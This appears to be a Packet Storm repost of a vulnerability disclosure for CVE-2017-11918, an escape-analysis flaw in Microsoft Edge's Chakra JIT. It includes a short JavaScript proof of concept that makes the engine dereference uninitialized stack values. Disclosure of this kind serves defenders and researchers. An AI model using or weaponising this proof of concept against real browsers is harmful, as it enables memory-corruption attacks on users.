Microsoft Edge Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.
e75c0b7061c30013e71afb6bd97779067f7723b0f2e1cf092d0c9d4b92c2d136Microsoft Edge: Chakra: JIT: Escape analysis bug
CVE-2017-11918
Escape analysis: <a href="https://en.wikipedia.org/wiki/Escape_analysis" title="" class="" rel="nofollow">https://en.wikipedia.org/wiki/Escape_analysis</a>
Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.
PoC:
function opt() {
let tmp = [];
tmp[0] = tmp;
return tmp[0];
}
function main() {
for (let i = 0; i < 0x1000; i++) {
opt();
}
print(opt()); // deref uninitialized stack pointers!
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed